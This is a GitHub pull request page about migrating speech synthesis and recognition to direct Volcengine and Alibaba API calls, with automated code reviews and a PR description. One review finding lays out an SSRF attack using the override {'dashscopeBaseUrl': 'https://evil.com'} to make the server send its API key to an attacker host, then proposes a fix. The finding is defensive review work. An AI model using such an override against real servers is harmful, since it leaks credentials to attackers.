feat: migrate TTS providers to backend direct routing#36
feat: migrate TTS providers to backend direct routing#36Kiritogu wants to merge 13 commits intodatawhalechina:devfrom
Conversation
This reverts commit 3014403.
There was a problem hiding this comment.
Your free trial has ended. If you'd like to continue receiving code reviews, you can add a payment method here.
Review Summary by QodoMigrate TTS/ASR providers to backend direct routing with incremental streaming and voice catalogs
WalkthroughsDescription• Migrate TTS providers to backend direct routing with official provider endpoints for Volcengine and Alibaba, replacing unspeech relay • Implement incremental TTS streaming for assistant responses with TtsStreamSegmenter and chunk-based playback • Add microphone input to chat interface and desktop overlay with source-aware listening context tracking • Implement Alibaba Bailian DashScope ASR integration with realtime WebSocket streaming support • Add local static voice catalogs for Volcengine and Alibaba providers with backend voice listing API • Normalize Alibaba model IDs by removing alibaba/ prefix in frontend and backend processing • Prune frontend speech providers to Volcengine, Alibaba, and local audio only with visibility filtering • Add comprehensive test coverage for TTS engine relay, ASR integration, provider voice catalogs, and field normalization • Implement transcript sanitization, language normalization, and browser recognition auto-restart logic • Add provider field filtering to hide redundant baseUrl configuration when defaults exist • Update default speech provider from OpenAI to browser-local-audio-speech • Add IDE configuration files and comprehensive development guide (CLAUDE.md) Diagramflowchart LR
FE["Frontend<br/>Chat/Settings UI"]
BE["Backend<br/>API Router"]
VC["Volcengine<br/>Official API"]
AC["Alibaba<br/>DashScope API"]
FE -->|"/api/tts/engines"| BE
FE -->|"/api/providers/voices"| BE
FE -->|"/api/asr/stream"| BE
BE -->|"Direct TTS"| VC
BE -->|"Direct TTS/ASR"| AC
FE -->|"Incremental text"| STREAM["TTS Stream<br/>Segmenter"]
STREAM -->|"Chunks"| QUEUE["Chunk Queue<br/>Runner"]
QUEUE -->|"Sequential requests"| BE
File Changes1. frontend/packages/stage-settings-ui/src/components/AudioSection.vue
|
Code Review by Qodo
1. Dify/Coze TTS broken
|
|
Blocker (can’t start the diff-scoped review)
What I can confirm from the local GitHub Actions event payload
Unblock options (pick one)
With that diff, I’ll produce diff-line-only inline comment commands (with exact |
There was a problem hiding this comment.
Code Review Summary
This PR migrates TTS/ASR providers from relying on the unspeech proxy to direct backend routing to Volcengine and Alibaba Cloud endpoints. The implementation is substantial (66 files, 8730+/992-) with solid test coverage for the new backend relay paths and frontend request builders. Two issues warrant attention before merge.
PR Size: XL
Issues Found
| Category | Critical | High | Medium | Low |
|---|---|---|---|---|
| Security | 1 | 0 | 0 | 0 |
| Error Handling | 0 | 1 | 0 | 0 |
| Hygiene | 0 | 0 | 1 | 0 |
Detail
-
[SECURITY-VULNERABILITY] SSRF via user-controlled provider URLs —
_resolve_volcengine_tts_urland_resolve_alibaba_tts_ws_urlaccept arbitrary URLs from the client-suppliedconfigdict. A caller can redirect the backend to internal services; if server-side API keys are configured via env vars, those credentials leak to the attacker-controlled endpoint. See inline comment ontts.py:459. -
[ERROR-SILENT] Voice catalog load errors silently cached —
_load_local_tts_voices_cachedcatchesExceptionand returns[]. Combined with@lru_cache, a transient read/parse failure is permanently cached as empty until process restart, with zero logging. See inline comment onregistry.py:204. -
[HYGIENE]
.idea/directory committed — 8 IDE-specific files (inspection profiles, module config, VCS mappings) are tracked. These should be added to.gitignorealongside.vscode/.
Review Coverage
- Logic and correctness
- Security (OWASP Top 10)
- Error handling
- Type safety
- Documentation accuracy
- Test coverage
- Code clarity
Automated review by Claude AI
| @router.post("/engines") | ||
| async def run_tts_engine(request: EngineRunRequest) -> StreamingResponse: | ||
| engine_id = _resolve_engine_id(request.engine) | ||
| config = _get_engine_config(engine_id) | ||
| text = _coerce_text(request.data) | ||
| async def run_tts_engine(request: EngineRunRequest) -> Response: | ||
| engine_id = _resolve_tts_engine_id(request.engine) | ||
| runtime_config = _get_tts_engine_config(engine_id) | ||
|
|
||
| text = _extract_tts_input(request.data) | ||
| if not text: | ||
| raise HTTPException(status_code=400, detail="Missing text input") | ||
|
|
||
| engine_type = (config.engine_type or "openai_compat").lower() | ||
| overrides = request.config if isinstance(request.config, dict) else {} | ||
| api_key = _resolve_tts_api_key(runtime_config, overrides) | ||
| if not api_key: | ||
| raise HTTPException(status_code=400, detail="Missing apiKey for TTS provider") | ||
|
|
||
| if engine_id in VOLCENGINE_ENGINE_IDS: | ||
| return await _forward_volcengine_tts( | ||
| runtime_config=runtime_config, | ||
| text=text, | ||
| overrides=overrides, | ||
| api_key=api_key, | ||
| ) | ||
|
|
||
| if engine_type in {"dify_tts", "dify"}: | ||
| stream = await _stream_dify_tts(config, text, overrides) | ||
| return StreamingResponse(stream, media_type="audio/mpeg") | ||
| if engine_id in ALIBABA_ENGINE_IDS: | ||
| return await _forward_alibaba_tts( | ||
| engine_id=engine_id, | ||
| runtime_config=runtime_config, | ||
| text=text, | ||
| overrides=overrides, | ||
| api_key=api_key, | ||
| ) | ||
|
|
||
| if engine_type in {"coze_tts", "coze"}: | ||
| stream = await _stream_coze_tts(config, text, overrides) | ||
| return StreamingResponse(stream, media_type="audio/mpeg") | ||
| payload = _build_unspeech_payload( | ||
| engine_id=engine_id, | ||
| runtime_config=runtime_config, | ||
| text=text, | ||
| overrides=overrides, | ||
| ) | ||
|
|
||
| base_url_override, api_key_override = _resolve_connection_overrides(overrides) | ||
| payload: Dict[str, Any] = {"model": config.model, "input": text} | ||
| payload.update(config.default_params) | ||
| payload.update(sanitize_config(overrides)) | ||
| speech_path = runtime_config.paths.get("speech") if runtime_config.paths else None | ||
| url = runtime_config.base_url.rstrip("/") + normalize_path(speech_path or "/audio/speech") |
There was a problem hiding this comment.
1. Dify/coze tts broken 🐞 Bug ✓ Correctness
run_tts_engine no longer routes dify_tts/coze_tts to their dedicated implementations and instead falls through to _build_unspeech_payload, which requires model and voice. Since dify-tts/coze-tts are still configured without a model, these engines will now error (400) or send incompatible payloads to their provider endpoints.
Agent Prompt
## Issue description
`backend/app/api/tts.py` removed the dedicated Dify/Coze TTS execution paths, but `backend/config/engines.yaml` still defines `dify-tts` and `coze-tts` engines that don't have an OpenAI-style `model`/`voice` contract. As a result, requests to these engines will now fail with "Missing model" or send incompatible JSON to `/text-to-audio` / Coze endpoints.
## Issue Context
The PR focuses on direct backend routing for Volcengine/Alibaba. That change unintentionally (or implicitly) altered behavior for other TTS engine types.
## Fix Focus Areas
- backend/app/api/tts.py[76-115]
- backend/app/api/tts.py[376-415]
- backend/config/engines.yaml[138-179]
ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools
| headers = { | ||
| "Content-Type": "application/json", | ||
| "Authorization": f"Bearer;{api_key}", | ||
| } | ||
| headers.update(runtime_config.headers) |
There was a problem hiding this comment.
2. Volcengine auth header typo 🐞 Bug ✓ Correctness
The Volcengine forwarder sets Authorization: Bearer;{api_key} (semicolon) instead of the standard
Bearer format used elsewhere in the backend. This is very likely to cause authentication failures
for all Volcengine TTS requests.
Agent Prompt
## Issue description
Volcengine TTS forwarding sends `Authorization: Bearer;{api_key}` which is inconsistent with the rest of the backend (`Bearer {api_key}`) and is likely an authentication-breaking typo.
## Issue Context
This occurs only in the new direct Volcengine routing path.
## Fix Focus Areas
- backend/app/api/tts.py[574-616]
ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools
|
|
||
| def _resolve_aliyun_dashscope_base_url(params: Dict[str, Any], config) -> str: | ||
| explicit_base = str( | ||
| _first_present(params, "base_url", "baseUrl", "dashscope_base_url", "dashscopeBaseUrl") |
There was a problem hiding this comment.
[SECURITY-VULNERABILITY] SSRF + credential leakage via unblocked dashscope_base_url / dashscopeBaseUrl override keys.
ASR_BLOCKED_CONFIG_KEYS blocks base_url and baseUrl, but _resolve_aliyun_dashscope_base_url also reads dashscope_base_url and dashscopeBaseUrl from the merged params. These keys are not in the block list, so a client can inject an arbitrary destination URL through the config override dict.
Attack scenario:
- Client sends
{"config": {"dashscopeBaseUrl": "https://evil.com"}}via the ASR endpoint - No
dashscopeApiKeyprovided → server falls back toresolve_api_key(config.api_key_env)(readsDASHSCOPE_API_KEYenv var) - Server POSTs to
https://evil.com/compatible-mode/v1/chat/completionswithAuthorization: Bearer <real_api_key> - Attacker captures the DashScope API key
Suggested fix — add the extra keys to the block set:
ASR_BLOCKED_CONFIG_KEYS = frozenset(
{
"api_key", "apiKey",
"base_url", "baseUrl",
"dashscope_base_url", "dashscopeBaseUrl",
"dashscope_api_key", "dashscopeApiKey",
"engine", "filename", "file_name",
"file", "content_type", "mime_type",
}
)Alternatively, _resolve_aliyun_dashscope_base_url should only read from config.base_url (server-side YAML config) and never from client-provided overrides.
| async with ws_connect( | ||
| ws_url, | ||
| additional_headers={ | ||
| "Authorization": api_key, |
There was a problem hiding this comment.
[LOGIC-BUG] Missing Bearer prefix in Alibaba TTS WebSocket Authorization header.
The DashScope WebSocket streaming synthesis API (/api-ws/v1/inference) expects Authorization: bearer <api_key>. This code sends the raw API key without the prefix, which will cause authentication to fail at runtime.
Compare with the ASR realtime code which correctly uses the prefix:
# asr.py:753 — correct
"Authorization": f"Bearer {resolved['api_key']}",Suggested fix:
additional_headers={
"Authorization": f"Bearer {api_key}",
"X-DashScope-DataInspection": "enable",
},|
|
||
| model = ALIYUN_ASR_REALTIME_MODEL | ||
| if not model: | ||
| raise HTTPException(status_code=400, detail="Alibaba Bailian ASR missing model") |
There was a problem hiding this comment.
[LOGIC-BUG] Dead code — unreachable model validation.
ALIYUN_ASR_REALTIME_MODEL is a non-empty constant ("qwen3-asr-flash-realtime"), so if not model: on line 516 can never be True. This check is dead code and may mask a real intent (e.g., the model should perhaps come from config or overrides rather than be hardcoded).
Suggested fix — remove the dead branch:
def _resolve_aliyun_dashscope_credentials(config, overrides):
...
model = ALIYUN_ASR_REALTIME_MODEL
return {
"params": params,
"api_key": api_key,
"model": model,
"base_url": _resolve_aliyun_dashscope_base_url(params, config),
}| try: | ||
| await session.ws.close() | ||
| except Exception: | ||
| pass |
There was a problem hiding this comment.
[ERROR-SILENT] _close_aliyun_realtime_session swallows all exceptions without logging.
Two bare except Exception: pass blocks discard errors silently. While cleanup code often ignores errors, the project constitution requires logging — unexpected failures during teardown (e.g., hung reader task, broken pipe) become invisible when debugging production issues.
Suggested fix — add logger.debug so the errors are at least traceable:
async def _close_aliyun_realtime_session(session: AliyunRealtimeSession) -> None:
if session.reader_task is not None:
session.reader_task.cancel()
try:
await session.reader_task
except asyncio.CancelledError:
pass
except Exception:
logger.debug("Error awaiting Aliyun reader task during cleanup", exc_info=True)
try:
await session.ws.close()
except Exception:
logger.debug("Error closing Aliyun WebSocket during cleanup", exc_info=True)There was a problem hiding this comment.
Code Review Summary
This is a large, ambitious PR that migrates TTS/ASR from third-party relay services to direct API integration with Volcengine and Alibaba DashScope, adds real-time streaming ASR, incremental TTS during LLM streaming, and microphone UI controls. The code is generally well-structured with good error handling patterns and comprehensive test coverage for utility functions. However, there is a critical SSRF vulnerability that must be fixed before merge.
PR Size: XL
(8862 additions, 992 deletions, 66 files)
Issues Found
| Category | Critical | High | Medium | Low |
|---|---|---|---|---|
| Security | 1 | — | — | — |
| Logic | — | 1 | 1 | — |
| Error Handling | — | — | 1 | — |
Critical
- [SECURITY-VULNERABILITY]
backend/app/api/asr.py:492— SSRF + credential leakage via unblockeddashscope_base_url/dashscopeBaseUrloverride keys. Client-provided config overrides can redirect server-side HTTP/WebSocket requests to arbitrary URLs, leaking the server's DashScope API key. TheASR_BLOCKED_CONFIG_KEYSblock list must be extended to cover these alias keys.
High
- [LOGIC-BUG]
backend/app/api/tts.py:709— MissingBearerprefix in Alibaba TTS WebSocketAuthorizationheader. The DashScope streaming synthesis API expectsAuthorization: bearer <key>, but the code sends the raw key. The ASR code atasr.py:753correctly usesf"Bearer {api_key}". This will cause Alibaba CosyVoice TTS to fail with an auth error in production.
Medium
-
[LOGIC-BUG]
backend/app/api/asr.py:515-517— Dead code:model = ALIYUN_ASR_REALTIME_MODELfollowed byif not model:is unreachable since the constant is a non-empty string. May mask intent to make the model configurable. -
[ERROR-SILENT]
backend/app/api/asr.py:832-838—_close_aliyun_realtime_sessionhas twoexcept Exception: passblocks that silently discard errors during cleanup. Should at least uselogger.debugfor production traceability.
Additional Note
The .idea/ directory (JetBrains IDE config) is included in the diff. As noted in the PR checklist, this should be removed from the commit and added to .gitignore.
Review Coverage
- Logic and correctness
- Security (OWASP Top 10)
- Error handling
- Type safety
- Documentation accuracy
- Test coverage
- Code clarity
Automated review by Claude AI
概要
将 TTS 和 ASR 模块从第三方中转服务(unspeech)迁移至直接对接火山引擎和阿里云 DashScope 官方 API,同时新增增量流式 TTS、实时 ASR WebSocket、麦克风交互等能力。
问题
unspeech.hyp3r.link,增加了延迟和单点故障风险关联 Issue / PR:
fix/tts-voice-flow,本 PR 正确地以dev为目标分支解决方案
后端:为火山引擎和阿里云分别实现原生 API 调用(火山引擎走 HTTPS + Base64 JSON 至
openspeech.bytedance.com,阿里云走 WebSocket 三阶段协议至dashscope.aliyuncs.com),消除对 unspeech 中转的依赖。新增阿里云 DashScope 实时 ASR(qwen3-asr-flash-realtime)WebSocket 流式识别。Provider Registry 新增本地语音目录(JSON 文件),按模型筛选兼容音色。前端:实现增量流式 TTS(
TtsStreamSegmenter在 LLM token 到达时按句分段、立即合成),新增多个工具函数模块化拆分逻辑。对话界面和桌面端新增麦克风按钮,支持静音/取消静音状态。精简语音提供商列表,仅保留已实际接入的 4 个提供商。变更内容
核心变更
后端 TTS 直连路由 (
backend/app/api/tts.py, +675/-191)_forward_volcengine_tts:直接调用火山引擎 TTS API,Bearer token 鉴权,Base64 音频解码_forward_alibaba_tts:通过 WebSocket 对接阿里云 CosyVoice(run-task → continue-task → finish-task 三阶段协议)_stream_dify_tts、_stream_coze_tts)和旧的流式代理逻辑后端 ASR 实时流 (
backend/app/api/asr.py, +613/-24)/compatible-mode/v1/chat/completions+input_audio)AliyunRealtimeSession实时 WebSocket ASR(wss://dashscope.aliyuncs.com/api-ws/v1/realtime)-realtime后缀,批量自动去除Provider Registry (
backend/app/services/providers/registry.py, +225/-4)list_voices从本地 JSON 目录加载音色列表(LRU 缓存)compatible_models过滤,匹配当前选中模型前端增量流式 TTS (
speech-output.ts+ 新工具模块)TtsStreamSegmenter:按标点和特殊标记分段 LLM 流式 tokenrunTtsChunkQueue:顺序合成分段,失败时回退合并剩余文本tts-chunker.ts:支持 CJK 分词(Intl.Segmenter)、保留小数、省略号规范化tts-direct-request.ts:构建直连 TTS 请求,405 时回退旧格式前端 ASR 增强 (
transcription.ts+ 新工具模块)shouldAutoRestartBrowserRecognition)decideCaptureFallback)sanitizeTranscript)zh→zh-CN,默认跟随navigator.language前端 UI
ChatArea.vue/DesktopChatOverlay.vue:新增麦克风按钮(含静音/取消静音视觉状态)App.vue:接入onTokenLiteral/onTokenSpecial驱动增量 TTSAudioSection.vue:语言改为下拉选择,移除冗余开关useHttpsScheme以支持麦克风权限辅助变更
alibaba.json(CosyVoice 音色)、volcengine.json(火山引擎音色)provider-fallback.ts/provider-options.ts:移除 7 个未接入的语音提供商provider-visibility.ts:白名单仅保留 4 个已接入提供商provider-fields.ts:有默认 baseUrl 时自动隐藏该字段websockets从 dev 依赖提升为运行时依赖(pyproject.toml)engines.yaml/providers.yaml更新为官方 API 端点注意事项
.idea/目录(JetBrains IDE 配置)被包含在提交中,建议加入.gitignore或从提交中移除CLAUDE.md作为项目指引文档一并提交破坏性变更
_stream_dify_tts、_stream_coze_tts等函数已删除openai-audio-speech改为browser-local-audio-speechrun_tts_engine从StreamingResponse改为Response(返回完整音频缓冲区)alibaba/cosyvoice-v1→cosyvoice-v1(去除前缀)测试
新增 13 个测试文件覆盖核心逻辑:
后端测试(4 个):
test_tts_engine_relay.py:火山引擎 payload 构建、阿里云模型规范化、错误提取test_asr_aliyun_dashscope.py:DashScope URL 构建、转写文本提取、模型规范化test_provider_voices_tts.py:音色目录加载和模型过滤test_provider_catalog_tts_defaults.py:TTS 提供商默认端点验证test_provider_catalog_aliyun_fields.py:阿里云 NLS 字段规范化test_asr_stream_disconnect.py:WebSocket 断连检测前端测试(9 个):
audio-direct.test.ts:直连请求构建和旧格式回退tts-chunker.test.ts:文本分段、CJK、特殊标记tts-stream-segmenter.test.ts:流式分段和 draintts-streaming-runner.test.ts:队列执行、错误处理browser-recognition-restart.test.ts:自动重启逻辑capture-startup.test.ts:Worklet 回退逻辑provider-fields.test.ts/provider-visibility.test.ts:字段过滤和可见性transcript-filter.test.ts/transcription-language.test.ts:转写清洗和语言规范化自测方式
pytest backend/tests/test_tts_*.py backend/tests/test_asr_*.py backend/tests/test_provider_*.py)pnpm -C frontend --filter @whalewhisper/web build构建通过Checklist
.idea/目录已从提交中移除或加入.gitignore由 Claude AI 自动生成